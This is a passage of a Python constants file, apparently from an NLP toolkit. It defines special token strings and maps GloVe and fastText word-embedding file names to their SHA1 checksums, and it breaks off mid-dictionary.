# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=too-many-lines
"""Constants."""
UNK_TOKEN = '<unk>'
BOS_TOKEN = '<bos>'
EOS_TOKEN = '<eos>'
PAD_TOKEN = '<pad>'
UNK_IDX = 0 # This should not be changed as long as serialized token
# embeddings redistributed on S3 contain an unknown token.
# Blame this code change and see commit for more context.
LARGE_POSITIVE_FLOAT = 1e18
LARGE_NEGATIVE_FLOAT = -LARGE_POSITIVE_FLOAT
GLOVE_NPZ_SHA1 = \
{'glove.42B.300d': ('glove.42B.300d.npz',
'7deee8f4860744db53ed9e50892effe9883e6d89'),
'glove.6B.100d': ('glove.6B.100d.npz',
'01f80f202fcabcc3e0804898349087bfc191dd1c'),
'glove.6B.200d': ('glove.6B.200d.npz',
'5e6e2bdab346c257f88d80d215d518e680d86e32'),
'glove.6B.300d': ('glove.6B.300d.npz',
'1db264aa936be62f055dfb72854204450bdf4399'),
'glove.6B.50d': ('glove.6B.50d.npz',
'aa16be8d184399d2199f83fd62586f2c30497bfa'),
'glove.840B.300d': ('glove.840B.300d.npz',
'b4ba390c1154736e07c0e67d9180935f5930e83c'),
'glove.twitter.27B.100d': ('glove.twitter.27B.100d.npz',
'0f7b82c223451d0002f79ba23596983cdbe0e2b1'),
'glove.twitter.27B.200d': ('glove.twitter.27B.200d.npz',
'41cc2d26f58a54622ce96bf6c8434360ab524f20'),
'glove.twitter.27B.25d': ('glove.twitter.27B.25d.npz',
'9f563d2f296995598cc46812b2fda05ad4c3c879'),
'glove.twitter.27B.50d': ('glove.twitter.27B.50d.npz',
'ce9959c056f2a0a780c468feeb4f823af51630e9')}
FAST_TEXT_NPZ_SHA1 = \
{'crawl-300d-2M': ('crawl-300d-2M.npz',
'9dd611a1fe280c63050cd546d3595400fc0eede4'),
'wiki.aa': ('wiki.aa.npz',
'48f163b80eb37f1806142169d3d4c05cf75b7339'),
'wiki.ab': ('wiki.ab.npz',
'860ceff119dd27e5b701b605879037c1310cbc3e'),
'wiki.ace': ('wiki.ace.npz',
'62938287464040491719f56a6f521f8f808beee8'),
'wiki.ady': ('wiki.ady.npz',
'646843afa260d018ed711df3f1ca9c3e000447b6'),
'wiki.af': ('wiki.af.npz',
'7b14cd27690b67fea318d0bac2283c16430680e2'),
'wiki.ak': ('wiki.ak.npz',
'20f309adad1c45958c97b6055d5838e05bbaea72'),
'wiki.als': ('wiki.als.npz',
'a8b03aa133c4f7da12fc27c2b167b7918b1e9805'),
'wiki.am': ('wiki.am.npz',
'ed3dd10cea64737f7a1623612ee099df9dc19f66'),
'wiki.ang': ('wiki.ang.npz',
'8efe64706d9d6b8eae38b2c7ff0b277e20592bc7'),
'wiki.an': ('wiki.an.npz',
'168046283c719ab96a29b1abae2e25a6575c7be8'),
'wiki.arc': ('wiki.arc.npz',
'049021b7decea4bc009b12936e56b4dbf5b760e7'),
'wiki.ar': ('wiki.ar.npz',
'7e325e1e98dfcdc9368d2ebe40ee834a2ed44912'),
'wiki.arz': ('wiki.arz.npz',
'7d851c2c7be3ee6f7fd896de7b76ea08e3fb08b0'),
'wiki.as': ('wiki.as.npz',
'01d38c29cd4bd99c1a8534abc058822da14a5b9c'),
'wiki.ast': ('wiki.ast.npz',
'9c9846ba5084505a0adea89c95c66e04efbf5ce9'),
'wiki.av': ('wiki.av.npz',
'7ef6a920c364638504e673cfde5f7675503fa81e'),
'wiki.ay': ('wiki.ay.npz',
'c1202e110930e3902397f5cb64a8359e013b469f'),
'wiki.azb': ('wiki.azb.npz',
'10351b7ef14ec2cb610d290cb6a3f6987ef5d8b3'),
'wiki.az': ('wiki.az.npz',
'74257c3bcd533a606afae509ea835dc036d61546'),
'wiki.ba': ('wiki.ba.npz',
'4a2857ed694d66864df562b376c2fa12fcb03646'),
'wiki.bar': ('wiki.bar.npz',
'e65c6b7e9ff83798d1eea05d166148837d53e615'),
'wiki.bat_smg': ('wiki.bat_smg.npz',
'6420584ae28ba6c9dd145fea8f096243d457c2d8'),
'wiki.bcl': ('wiki.bcl.npz',
'33606c970ab336b678393e2bdb8af2116d11cf7b'),
'wiki.be': ('wiki.be.npz',
'84487d341e333344cf71bc12c7a205d923762498'),
'wiki.bg': ('wiki.bg.npz',
'56f2a175b1a1d1a9cf9f1cea277cd0b46ffd7f66'),
'wiki.bh': ('wiki.bh.npz',
'07473989853a344a41aaa18f41030dc56d0d01c7'),
'wiki.bi': ('wiki.bi.npz',
'08adfa3c9ef3016d30ef69ea539d217ff67eda09'),
'wiki.bjn': ('wiki.bjn.npz',
'998a551283222931d3a26922308449950bfa3ec7'),
'wiki.bm': ('wiki.bm.npz',
'454ff9fbd4790e4a076d9a2087a51da28aa1332f'),
'wiki.bn': ('wiki.bn.npz',
'1f36f6f39c9a9b33bb8035c9a4dc7e04933604fd'),
'wiki.bo': ('wiki.bo.npz',
'b9fe87318428de0a7790de175b5fec80c5af482d'),
'wiki.bpy': ('wiki.bpy.npz',
'5c7853173d27e2c018c24eca69de8d5f34511b0d'),
'wiki.br': ('wiki.br.npz',
'7aa66a2034fbfaa1d39e637385d48610238797c9'),
'wiki.bs': ('wiki.bs.npz',
'a019a4677677c2e9e4d899326b2b6c15ad6c011a'),
'wiki.bug': ('wiki.bug.npz',
'09ae3477941d7a99d1df494368d7efb0b2c18913'),
'wiki.bxr': ('wiki.bxr.npz',
'b832c691b8ddd95896c052d3d15e1f98d72068d5'),
'wiki.ca': ('wiki.ca.npz',
'391e0d4daad08649251274fa1cc2a5f49c7728b1'),
'wiki.cbk_zam': ('wiki.cbk_zam.npz',
'02e57a763bc9f9eadaba57953383dd12a0a78a37'),
'wiki.cdo': ('wiki.cdo.npz',
'd6e8f422327e8b2273f1f2662d793707ece6695d'),
'wiki.ceb': ('wiki.ceb.npz',
'23bc0bb9aeaa57dff35092766941a866de142aae'),
'wiki.ce': ('wiki.ce.npz',
'182b2a889256119a6d379d501c55c7621e5855db'),
'wiki.ch': ('wiki.ch.npz',
'82dd77512fcb463481f43c9cef3507e2baa90d7b'),
'wiki.cho': ('wiki.cho.npz',
'b0b620fc2442d1a6e2440e71a424861c80175f0c'),
'wiki.chr': ('wiki.chr.npz',
'3d62c6b95c5af46abd6234426ae760cca65d5bd0'),
'wiki.chy': ('wiki.chy.npz',
'34a28a22da79aebc100e3714b825c95c8d5f54a3'),
'wiki.ckb': ('wiki.ckb.npz',
'ad19461e4be583d08b7693ff5b1e9d590ed41add'),
'wiki.co': ('wiki.co.npz',
'fa60d9f0e79f1c7e15f381aef983a0f4f31c05a8'),
'wiki.crh': ('wiki.crh.npz',
'540270ba6edd9d7b2f7efca52b3b407524ac67d1'),
'wiki.cr': ('wiki.cr.npz',
'f06b77465a38ec960d7d5a7554b848c37e945c76'),
'wiki.csb': ('wiki.csb.npz',
'b8b28559cf2541341af98e2aa755856765bdeabf'),
'wiki.cs': ('wiki.cs.npz',
'19881e931fe06abf341450f00c342d364313e232'),
'wiki.cu': ('wiki.cu.npz',
'731e0d00abd53bc2a8eb6cf37f6ab883cff34e15'),
'wiki.cv': ('wiki.cv.npz',
'e60034fcffb7dfef7b236ddba1194c3aa20b7967'),
'wiki.cy': ('wiki.cy.npz',
'5a0fb967b5556f007c0d5065f951a3d3b1c1005a'),
'wiki.da': ('wiki.da.npz',
'd06258014ba2c7450bc2d55edfdf1731433e42e5'),
'wiki.de': ('wiki.de.npz',
'a21694dfd2af63bd7bb00f0b60b28e88bd1153f1'),
'wiki.diq': ('wiki.diq.npz',
'4f6c77a86b39834a7130419967759afd8cc26b84'),
'wiki.dsb': ('wiki.dsb.npz',
'e74f1d346a8db96987bff0c33ee5f886907c380a'),
'wiki.dv': ('wiki.dv.npz',
'5d6fe6f0eec2e7704121d5aba03b4edbb28af873'),
'wiki.dz': ('wiki.dz.npz',
'77c639d36d0355b2de5adead7996eae342b852a6'),
'wiki.ee': ('wiki.ee.npz',
'4b5a76127d57515d3e8a76787cdefde5856b754a'),
'wiki.el': ('wiki.el.npz',
'a00bcb97e7898931196a1c69f7a492e5b6202661'),
'wiki.eml': ('wiki.eml.npz',
'b475d626b3d97e7a68c02827fdc7900599e838c6'),
'wiki.en': ('wiki.en.npz',
'ad5ec6d49db6c6fe76b8e85ff05d34e5d0e1eb6a'),
'wiki.eo': ('wiki.eo.npz',
'18049b0010520d13e676f5a82e8bb90153d99003'),
'wiki.es': ('wiki.es.npz',
'a6d192ba7d82d762f8367e75ca951aad4d11e410'),
'wiki.et': ('wiki.et.npz',
'4beb7025cf88f1aa62d025b187f0cb09aee61858'),
'wiki.eu': ('wiki.eu.npz',
'5e1a8197e35f20a2476798bbb935b4c131289c4f'),
'wiki.ext': ('wiki.ext.npz',
'049b2d1b0a8b102b45907cf487cac30aa294e0a0'),
'wiki.fa': ('wiki.fa.npz',
'81ed274997c87ef87d73d25e166ca06272ce426f'),
'wiki.ff': ('wiki.ff.npz',
'4867dc74cd53ca0b0f769af4fa1ea420406b59bf'),
'wiki.fi': ('wiki.fi.npz',
'6d1291b854045179f8171ac7d62ede7d8ac159a2'),
'wiki.fiu_vro': ('wiki.fiu_vro.npz',
'dd87806d9dc8833fa0e21e35a50815ebdbaa6c8b'),
'wiki.fj': ('wiki.fj.npz',
'cf5c31b0a69276f5dd18ab738ed92444abaeb755'),
'wiki.fo': ('wiki.fo.npz',
'ffc19807d528af000861a94cfb8097bd686e14fc'),
'wiki.fr': ('wiki.fr.npz',
'8f06d5dbe3cf7214354fe9b2f6eca0ef7419f063'),
'wiki.frp': ('wiki.frp.npz',
'c8b200ae592478d3cd0bfaafcd7aa19de8a3bfe5'),
'wiki.frr': ('wiki.frr.npz',
'fa5e5c39ea2a45793c679eacea290a35e37405ea'),
'wiki.fur': ('wiki.fur.npz',
'a61a8940d059f25000e3fe23933e5ed0d37e65d3'),
'wiki.fy': ('wiki.fy.npz',
'46f9f41bdf6f4fb8e27a753290413d745465963b'),
'wiki.gag': ('wiki.gag.npz',
'49fb01230e6803544122d47ab7d3fe694d1444f2'),
'wiki.gan': ('wiki.gan.npz',
'716b7b26acc15975f30caf3c6effa111516fcca5'),
'wiki.ga': ('wiki.ga.npz',
'ea934bc1fdc1acf6caf9ac746c6c499251f1fdee'),
'wiki.gd': ('wiki.gd.npz',
'597017b5a32d933f194595d3656f858e37e70a62'),
'wiki.glk': ('wiki.glk.npz',
'91a5834658bc2d48714e8807ef24efb79567b4b5'),
'wiki.gl': ('wiki.gl.npz',
'2fa8e48d6ae1e9c9d542eb3f2156cf9e359e66c2'),
'wiki.gn': ('wiki.gn.npz',
'e359eef3928e1f1b5d8fcf0ea532e8794c66289a'),
'wiki.gom': ('wiki.gom.npz',
'8cd361481c23f7545cc2bd8f1bf22aa7400edd4d'),
'wiki.got': ('wiki.got.npz',
'd05daf105611150695e61775fdff2c500b36be3f'),
'wiki.gu': ('wiki.gu.npz',
'0ce175c5fc39bab4032892f70c9d2bb850af0f4a'),
'wiki.gv': ('wiki.gv.npz',
'2c573f873d607831ff01b64603c17b8db79bd7e1'),
'wiki.hak': ('wiki.hak.npz',
'e6048727799cdf149f5c50037e0fc59300d33a94'),
'wiki.ha': ('wiki.ha.npz',
'f18ea7286bbd390c5470896b2c99cb1adc740064'),
'wiki.haw': ('wiki.haw.npz',
'18bcd85d2e06b1b889f0835fc5b62697fdf32d72'),
'wiki.he': ('wiki.he.npz',
'76915ff167b6ecb7b7e22ff0ca46914a55d344af'),
'wiki.hif': ('wiki.hif.npz',
'12153aaf98d76d5502ab77a27cd0b9a539f61513'),
'wiki.hi': ('wiki.hi.npz',
'249666a598991f6ec147954c6af9e531fd1cd94e'),
'wiki.ho': ('wiki.ho.npz',
'3f804fd69780c0789708b56ea9d48715f8e38f26'),
'wiki.hr': ('wiki.hr.npz',
'9a3de28e69f97048bfb480b4f83eaab6149f66ad'),
'wiki.hsb': ('wiki.hsb.npz',
'7070bf64e13299dd66ac0e9f8e24011a56b6bfe8'),
'wiki.ht': ('wiki.ht.npz',
'a607093d511afeb584d02dc676bc5a27eff66287'),
'wiki.hu': ('wiki.hu.npz',
'9b2c4750daf1bcf39768572e874b5afda0e2f0bc'),
'wiki.hy': ('wiki.hy.npz',
'ec0461a102a6fb00bd324f66cefd3c8d55a7093a'),
'wiki.hz': ('wiki.hz.npz',
'5dfb8afbdae6b4148c3e55ab459c56a74b46b463'),
'wiki.ia': ('wiki.ia.npz',
'4cfaaf053b9513bbf5b2423258c0f01d20256de6'),
'wiki.id': ('wiki.id.npz',
'bace396bb9941cc9e5b2e5f5a19be6db833c5fd4'),
'wiki.ie': ('wiki.ie.npz',
'1bae7256c2e763ce6d692d1c0a603d99a8b22826'),
'wiki.ig': ('wiki.ig.npz',
'23128e54a5e143891d392d621723bad9cfc8cf7b'),
'wiki.ii': ('wiki.ii.npz',
'54bc16d05da512481865a89ecf30260b0acc04dc'),
'wiki.ik': ('wiki.ik.npz',
'f8015227e893d2375699b7d132b306ba381f02ac'),
'wiki.ilo': ('wiki.ilo.npz',
'185a11f81bd5d24a34558dda81ee4735f5ba150b'),
'wiki.io': ('wiki.io.npz',
'ddf8180a90aa6ee5be93a2582cc99c535f21363e'),
'wiki.is': ('wiki.is.npz',
'968f8dd2a093b279a6f7aaa734008454bf51d724'),
'wiki.it': ('wiki.it.npz',
'fdfb857a309b2c3d29482bb5cc55f21b858d2e6f'),
'wiki.iu': ('wiki.iu.npz',
'fa8896730bd6c24c3473daa22116d1016294e7f7'),
'wiki.jam': ('wiki.jam.npz',
'a8f0d0b99c89ace0a6401b8fcda261d06065faaf'),
'wiki.ja': ('wiki.ja.npz',
'8d42e5a40e4d1d8645b2d80b873a65cadcf68b5c'),
'wiki.jbo': ('wiki.jbo.npz',
'145fc999ab004b348cf9bf445f0a93a7a145308b'),
'wiki.jv': ('wiki.jv.npz',
'66978770bf06e42414395cf5fd8c596044d72bec'),
'wiki.kaa': ('wiki.kaa.npz',
'624a640ecb9901b2aba2e9f44ab615146ecb2862'),
'wiki.kab': ('wiki.kab.npz',
'e97f93b6ba65e95c85b7541932cf53c5ad9eb896'),
'wiki.ka': ('wiki.ka.npz',
'1ca8376e1e0cbd58001c1b51a2d488a2874a6743'),
'wiki.kbd': ('wiki.kbd.npz',
'f2d2a05b06723ac549784ad5470d84f5742a1352'),
'wiki.kg': ('wiki.kg.npz',
'fa7f6d5f660a173a3e75342d449980eedcdc789e'),
'wiki.ki': ('wiki.ki.npz',
'21a8c7c616c0050c51c288861f3423f313e4f634'),
'wiki.kj': ('wiki.kj.npz',
'f3c347509a0d81f4f7fdbb8b22889b8d76e5014e'),
'wiki.kk': ('wiki.kk.npz',
'bc24a3289e1c1e18e16b6789c2f9f92af1e73071'),
'wiki.kl': ('wiki.kl.npz',
'b8b7e7359f067836e2be2ecfe9f35a820b00fe1d'),
'wiki.km': ('wiki.km.npz',
'e053799fd01463808432dc035bef3e36620e2f36'),
'wiki.kn': ('wiki.kn.npz',
'2849a0a8b3453e9bf6af05d4c7bd3db881dd1068'),
'wiki.koi': ('wiki.koi.npz',
'a9b02e9bd41833bcd54769f94626019c03f29997'),
'wiki.ko': ('wiki.ko.npz',
'764d9896e74b5a26c6884d48bce3bed8ed3a7822'),
'wiki.krc': ('wiki.krc.npz',
'bfe39598c718f1cc95909db7544b3214b308a97c'),
'wiki.kr': ('wiki.kr.npz',
'1e6af853d4a8ea7830e116eb9b61ac5d7d9a315c'),
'wiki.ksh': ('wiki.ksh.npz',
'66cd0e3e0a0b0282a13960571ebe7cddd7706bf2'),
'wiki.ks': ('wiki.ks.npz',
'85f1adaa05b854df4dede745a1aaab3836e60770'),
'wiki.ku': ('wiki.ku.npz',
'faf90584e5a45e6d0f9eeb88399b82abe037d584'),
'wiki.kv': ('wiki.kv.npz',
'9f2b41822013a412da9c99fac06eed8be03ca192'),
'wiki.kw': ('wiki.kw.npz',
'3eed8a8fc97a2fc79241b8474a458c98d00fc897'),
'wiki.ky': ('wiki.ky.npz',
'0116ff90f10a6c0728e1ea86d8a44896ea83270a'),
'wiki.lad': ('wiki.lad.npz',
'5af2015b3d1c5e8563f0e92721580988ebe2ce50'),
'wiki.la': ('wiki.la.npz',
'7143303a3ea13c7668eb90ea6e3d2ca69857a3be'),
'wiki.lbe': ('wiki.lbe.npz',
'f206a3c35a184ba5d2b32ee68640eadf66c847da'),
'wiki.lb': ('wiki.lb.npz',
'143dc6337f3690379282034c460c613d7f144923'),
'wiki.lez': ('wiki.lez.npz',
'b29a680decc6b29f24e8eb9e4f8e11e3419d45f1'),
'wiki.lg': ('wiki.lg.npz',
'866640ce62cedbc1d453b7ea3c289c291ad76e13'),
'wiki.lij': ('wiki.lij.npz',
'0dcd3d7009ae89b1016ca6cdb99a9f0d70bc4baf'),
'wiki.li': ('wiki.li.npz',
'4666b3c238256d7b7623a136db19b8b9f4754734'),
'wiki.lmo': ('wiki.lmo.npz',
'ac89fa7cfe0675950bcb31c66bf3f88a3cfc98f0'),
'wiki.ln': ('wiki.ln.npz',
'fba158719944aabe58e0002a90be0ed77e11702d'),
'wiki.lo': ('wiki.lo.npz',
'1e113e340a8a93d385e14502c9c4e3bcdf6c3101'),
'wiki.lrc': ('wiki.lrc.npz',
'42cb755f398fba6f0da7949c91e92b55654bd482'),
'wiki.ltg': ('wiki.ltg.npz',
'182f75859e228d1162215f28fe7f2dca127624a4'),
'wiki.lt': ('wiki.lt.npz',
'66aa944bd2e777cb82d6d59b1f2f837b6c48cb37'),
'wiki.lv': ('wiki.lv.npz',
'2be8f926da85694fa998bf79d80b61ebb8d67576'),
'wiki.mai': ('wiki.mai.npz',
'b8a9c36e2a0f1bb84a44dc762250d2a9007ef637'),
'wiki.map_bms': ('wiki.map_bms.npz',
'6f0394d6b3d08a946e3df4b9355efe94148f018a'),
'wiki.mdf': ('wiki.mdf.npz',
'774ee35334641db57f9ac9069961c5372a5d92e8'),
'wiki.mg': ('wiki.mg.npz',
'496c48ef668f08ce95ebb11ce1ce5026b52d935c'),
'wiki.mh': ('wiki.mh.npz',
'352edd84f99c5aa277a7306f6cacea1fab065ed3'),
'wiki.mhr': ('wiki.mhr.npz',
'dd78b27a674ac10411cdf74ac32f9391506b17e0'),
'wiki.min': ('wiki.min.npz',
'628b406441ab03bc8aa68195ada50bfdc8226f34'),
'wiki.mi': ('wiki.mi.npz',
'754127b473861cd4f9ae034c9f527a34827b1f00'),
'wiki.mk': ('wiki.mk.npz',
'b09fed4f56c296f13c4020ef1fec498382a38b73'),
'wiki.ml': ('wiki.ml.npz',
'02fb55d97ca2f0408f0e7e8dd6a661bbc3319a2a'),
'wiki.mn': ('wiki.mn.npz',
'08b2c45689aa5d9ec49df96dc7c777ce9b9a0b4b'),
'wiki.mo': ('wiki.mo.npz',
'638c2e8bd2352fd52921b9ae62f578b8357bab49'),
'wiki.mrj': ('wiki.mrj.npz',
'ec5cf1f4fb8dfdca64d8172974e620eb8fa41626'),
'wiki.mr': ('wiki.mr.npz',
'074dd68c947c2f137a3e84b55012925f00213139'),
'wiki.ms': ('wiki.ms.npz',
'3dbe9e9d70251de8a374776ff1250a9c3103ee59'),
'wiki.mt': ('wiki.mt.npz',
'f5103998a68d1b178387417436a83123d44aba01'),
'wiki.multi.ar': ('wiki.multi.ar.npz',
'a010d1d81a465c56ebaf596b3e8e8795e7f0f8e3'),
'wiki.multi.bg': ('wiki.multi.bg.npz',
'c04018f3a600cee170f12a36cdd35b4727a2aade'),
'wiki.multi.ca': ('wiki.multi.ca.npz',
'eef52a0cf20c133ca9065de25f0702861a8cfa29'),
'wiki.multi.cs': ('wiki.multi.cs.npz',
'c5f547aa78c0e3d7dae67a0334d500bf2a86aa30'),
'wiki.multi.da': ('wiki.multi.da.npz',
'24374f2ee169b33327feeee46da31b0de1622fe4'),
'wiki.multi.de': ('wiki.multi.de.npz',
'2e6c119b345bebd34b56eaaf855d6703889b11f7'),
'wiki.multi.el': ('wiki.multi.el.npz',
'9d122beedb80a2e5334946641e5bafd32c01e76b'),
'wiki.multi.en': ('wiki.multi.en.npz',
'8c3c480b4cb2690304173713a646280613b244a8'),
'wiki.multi.es': ('wiki.multi.es.npz',
'483a22656e4fb2a01e9f4ef8156b261e780850ab'),
'wiki.multi.et': ('wiki.multi.et.npz',
'22498c7b91645a3874fa738b5cfb16bf98b6f97c'),
'wiki.multi.fi': ('wiki.multi.fi.npz',
'765a6f0b63777bff4ae6ca2b461c5889c03d6a70'),
'wiki.multi.fr': ('wiki.multi.fr.npz',
'decd9aacf600114b8a36072535c0309874a37c83'),
'wiki.multi.he': ('wiki.multi.he.npz',
'7eee940c1b85936f59122f4b1a166223dd946674'),
'wiki.multi.hr': ('wiki.multi.hr.npz',
'1673963416af088f8bf15576afb33d58115db35c'),
'wiki.multi.hu': ('wiki.multi.hu.npz',
'a1fbe6ededf3cbaa3eaa22dd8b20cce4b36cfc6d'),
'wiki.multi.id': ('wiki.multi.id.npz',
'6c3e721febb511ede7db7bf978d65769e4270f5c'),
'wiki.multi.it': ('wiki.multi.it.npz',
'fc5bfc11e0165e8d95c1708573dad5e456826c73'),
'wiki.multi.mk': ('wiki.multi.mk.npz',
'6cd50198355674f156fc863108d9bebf11cfabd9'),
'wiki.multi.nl': ('wiki.multi.nl.npz',
'4fa06b9230c95dfa5a9e9a5d80f1f5ba614d3cbf'),
'wiki.multi.no': ('wiki.multi.no.npz',
'63756168c1101e73fba8d1a5015f32b8892819e6'),
'wiki.multi.pl': ('wiki.multi.pl.npz',
'958b8e8bead965ba1bb1433e1c960fc3e12a10fb'),
'wiki.multi.pt': ('wiki.multi.pt.npz',
'22f07df1609d79b95344ee575ea43141424a1528'),
'wiki.multi.ro': ('wiki.multi.ro.npz',
'73180b3e382519004bf38ea7b86237aacbbe813a'),
'wiki.multi.ru': ('wiki.multi.ru.npz',
'3b2eb9163f35e90bf2ce1cd3c997b354d0c34f59'),
'wiki.multi.sk': ('wiki.multi.sk.npz',
'606a0c3ba9849070c6b6b8c22d920fdeed9a1385'),
'wiki.multi.sl': ('wiki.multi.sl.npz',
'3cfdab5043b8cfe1535cb6dbd4c9e68847ad5904'),
'wiki.multi.sv': ('wiki.multi.sv.npz',
'4f1494885b9a831e87cfa3c15f2204c4a73c0779'),
'wiki.multi.tr': ('wiki.multi.tr.npz',
'54f90d5ddb9a65538a41e37c5a67ed933a5e4885'),
'wiki.multi.uk': ('wiki.multi.uk.npz',
'500fd26b1d7a25b42458012e99f9f76642e0c787'),
'wiki.multi.vi': ('wiki.multi.vi.npz',
'3955809cceb300965c15f9372221417719bb0db8'),
'wiki.mus': ('wiki.mus.npz',
'a5f48934a3fa6eaf4929098046c93fc94dd6bcb6'),
'wiki.mwl': ('wiki.mwl.npz',
'8a5e2c272166f8a72c5694ca6c3104d5f49179ec'),
'wiki.my': ('wiki.my.npz',
'5e035aca16700d7d6695af8a6d3a88ac847aaeb7'),
'wiki.myv': ('wiki.myv.npz',
'd4cfaab70c640033e02c0fc0c5a3615ae836c569'),
'wiki.mzn': ('wiki.mzn.npz',
'ad09ac584ae455b5862b95125ef409360ae18445'),
'wiki.nah': ('wiki.nah.npz',
'2dc454ef37d059f2053af46cfa1f4f0ca939cba0'),
'wiki.na': ('wiki.na.npz',
'401f0f880eb7aa78d21348bc1e0a3953b3e81bf0'),
'wiki.nap': ('wiki.nap.npz',
'996da46aeeab5644ba766d00c5e343b1553361d7'),
'wiki.nds_nl': ('wiki.nds_nl.npz',
'5a9307e16b13a5a82ec19a52b33254537e7198e7'),
'wiki.nds': ('wiki.nds.npz',
'b249a87c78c52becf51e7b50aaf9f9b6a36585f1'),
'wiki.ne': ('wiki.ne.npz',
'a601db2647a74ffd2b4b43dcb8584735f555459c'),
'wiki.new': ('wiki.new.npz',
'c398a3775aba9c68ce765cfdfb6b188f7c47e4c6'),
'wiki-news-300d-1M': ('wiki-news-300d-1M.npz',
'0a03bbd508e5381e140476140fb121afeb0050ed'),
'wiki-news-300d-1M-subword': ('wiki-news-300d-1M-subword.npz',
'69edae21375407781c727dcb9e534e79d712d137'),
'wiki.ng': ('wiki.ng.npz',
'befd774d15f69d43547e13e5ea3a97c4cb1ab405'),
'wiki.nl': ('wiki.nl.npz',
'5a7cb6f1dd0a7621202abba9461ac2c5bf905219'),
'wiki.nn': ('wiki.nn.npz',
'8e5059ddeb24050fadaa5cc4622b13feb3e4a226'),
'wiki.no': ('wiki.no.npz',
'5ce6e0f793e66f081652f64013968099de03d9f9'),
'wiki.nov': ('wiki.nov.npz',
'95ed23b4cfd7a65afa1c12c7dbdce6af53923d77'),
'wiki.vec': ('wiki.vec.npz',
'08ebb912efeb9df1c7d05e1af90484d210dff47e'),
'wiki.nrm': ('wiki.nrm.npz',
'e58614b4508ff9810f0b58fd818f973775bc918d'),
'wiki.nso': ('wiki.nso.npz',
'56a2ebe260241402d117cd89c5c872b9c96ff05b'),
'wiki.nv': ('wiki.nv.npz',
'c713051fe03ec1f60314bb42161b2a47fb5e169a'),
'wiki.ny': ('wiki.ny.npz',
'ba5a1725955cbc13e7fd93ab499f8085840c992c'),
'wiki.oc': ('wiki.oc.npz',
'259e7d994c38a4cfc140fb07016b82d6781e5027'),
'wiki.olo': ('wiki.olo.npz',
'0fea70f887def4779ee70a79366b88f1ada65004'),
'wiki.om': ('wiki.om.npz',
'47e2d756b5f8913085d901375c1b4e0b118a4221'),
'wiki.or': ('wiki.or.npz',
'7e274ab060219b019aa02bb97941cc6e162fd01f'),
'wiki.os': ('wiki.os.npz',
'19e8199cc2aaffdb07b6c558dbc5465ac6e03155'),
'wiki.pag': ('wiki.pag.npz',
'eddf4931547649026c02f893297ef673ec6158bb'),
'wiki.pam': ('wiki.pam.npz',
'40109aa174bd9f0fa657839bb548e2b0646c58d3'),
'wiki.pa': ('wiki.pa.npz',
'8a5870717e9e641b1f757f13259171698118de2e'),
'wiki.pap': ('wiki.pap.npz',
'999c8e5b005ca20d9998fbbe4fa79177f69e24c0'),
'wiki.pcd': ('wiki.pcd.npz',
'e975066b323a65cdc5e4c27138ef674d2cf7250b'),
'wiki.pdc': ('wiki.pdc.npz',
'5c770b9d56f276b0aa535845f175c05ee1cea615'),
'wiki.pfl': ('wiki.pfl.npz',
'0063d0b633ee529a75482b36ed4f4da7d64994ec'),
'wiki.pih': ('wiki.pih.npz',
'ce1d76c94d248545eea0d7436c54849dbb380bfc'),
'wiki.pi': ('wiki.pi.npz',
'c7d56c334bf529f8b3655693d207a80feaec4aed'),
'wiki.pl': ('wiki.pl.npz',
'0d612fdf871a1a4084c867f394940475be899443'),
'wiki.pms': ('wiki.pms.npz',
'ca149a2fb138011315bb6d5d61c7a5647e515e51'),
'wiki.pnb': ('wiki.pnb.npz',
'9ec82d02ad8894056c67991cf8ce927bcca74ee2'),
'wiki.pnt': ('wiki.pnt.npz',
'3f90123407bb8fc838a0a0d3700a14e15f5b26aa'),
'wiki.ps': ('wiki.ps.npz',
'7edebc02ac16f5fab83eb10b7d0fab821a9a4d43'),
'wiki.pt': ('wiki.pt.npz',
'f172fd801edd1ad9d319ba44146d40b5d682a473'),
'wiki.qu': ('wiki.qu.npz',
'68bec60ccfe1826c3b3a8968574488dbc74cdf7b'),
'wiki.rm': ('wiki.rm.npz',
'00fb191fc736ba60cb23e76169dfccde9a9daad0'),
'wiki.rmy': ('wiki.rmy.npz',
'c5e93cc37ff7293b9a1d9fe55c42d6fbde372b97'),
'wiki.rn': ('wiki.rn.npz',
'57b8e0d6999269be227af6ef2797a9cf8386ff1b'),
'wiki.roa_rup': ('wiki.roa_rup.npz',
'e06d6b5672a59bb9e83143bc8b28300d23c09546'),
'wiki.roa_tara': ('wiki.roa_tara.npz',
'c083105f40236dc3711f06c1b40e8ee7a714b99d'),
'wiki.ro': ('wiki.ro.npz',
'766bc0cb58a65b0b1763b9a0d90e91ab982eb20d'),
'wiki.rue': ('wiki.rue.npz',
'9a91fa093cd48d7d658d526b0ccda48dc59cd7f4'),
'wiki.ru': ('wiki.ru.npz',
'd59d099481c22d5592ab9635c9ee48060aa0bf45'),
'wiki.rw': ('wiki.rw.npz',
'e99ee87d249f6c157c5c97397d1025d798b85c69'),
'wiki.sah': ('wiki.sah.npz',
'85dae39097b29bc8e2b64f343a77794e4a62f91a'),
'wiki.sa': ('wiki.sa.npz',
'7d1928d7c67400045ac1b35a37a0e3089690d875'),
'wiki.scn': ('wiki.scn.npz',
'27d7b8050bbeed8ce196061c610216760b053c39'),
'wiki.sc': ('wiki.sc.npz',
'69c7b8be0f03a1bbd615695f93bdd78f96a58e16'),
'wiki.sco': ('wiki.sco.npz',
'4880282f59d3338b67fbff75359e2d24896e95bb'),
'wiki.sd': ('wiki.sd.npz',
'0ed8da4d27223db717a612cf0c88582351db6e19'),
'wiki.se': ('wiki.se.npz',
'0f4b2e060d5e29f96ca73aab29c967e79db69c17'),
'wiki.sg': ('wiki.sg.npz',
'a5e4edf34fe1a88b322da4c3922ec5a470e200c6'),
'wiki.sh': ('wiki.sh.npz',
'c13f1e94676bc939560193f7aa7ffd7d604707b3'),
'wiki.simple': ('wiki.simple.npz',
'352d0575e7d60b08e1dfce2c5de713906f0ed78f'),
'wiki.si': ('wiki.si.npz',
'204f9ffbe7770a9f56d3b2fb26999165015f5c33'),
'wiki.sk': ('wiki.sk.npz',
'7a9820b5a343b242660bf2595d1ecbf6e00a76d6'),
'wiki.sl': ('wiki.sl.npz',
